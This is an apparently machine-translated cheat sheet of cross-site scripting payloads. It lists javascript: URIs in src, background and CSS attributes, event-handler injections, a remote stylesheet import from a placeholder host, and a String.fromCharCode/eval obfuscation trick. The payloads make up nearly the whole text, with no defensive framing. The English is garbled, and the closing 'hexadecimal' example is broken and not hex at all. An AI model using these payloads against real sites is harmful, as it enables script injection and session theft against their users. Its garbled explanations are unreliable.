the first sort:
<img src=javascript:alert() />
<iframe src=javascript:alert()></iframe>
<script src=javascript:alert()></script>
The second category:
<div style=background-image:url(javascript:alert())>
<img style=background-image:url(javascript:alert())>
<b style=background-image:url(javascript:alert())>
Css file references on other sites with STYLE tags
<STYLE>@import'http://xxx.xom/xss.css';</STYLE>
css file contains a cross-site program
body{
background-image:url('javascript:alert();');
}
The third category:
<table background=javascript:alert()></table>
<body background=javascript:alert()></body>
The fourth category:
<Div onmouseenter = alert ()> mouse enters the region performed Javascript </ div>
<Div onmouseleave = alert ()> mouse leaves Javascript execution region </ div>
<Div onmousewheel = alert ()> Mouse performed Javascript </ div> when the roller constituency
<Div contentEditable = "true" onfocusin = alert ()> to obtain focus performed Javascript </ div>
<Div contentEditable = "true" onfocusout = alert ()> loses focus performed Javascript </ div>
<Marquee onstart = alert ()> each scroll content execution Javascript </ marquee>
<Img src = "" onerror = alert ( 'Error Code Execution Load picture')>
<Img src = "" onclick = alert ( 'Click on the picture to execute code')>
<Img onmouseover = alert ( 'rollover execution code image')>
<img style=background-image:url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,41)))>
Code to be executed "alert ()" is converted to decimal ASCII code, spaced apart by a comma, and then String.fromCharCode decoding, execution and finally eval
It can also be hexadecimal treatment:
<img style=background-image:url(javascript:alert()>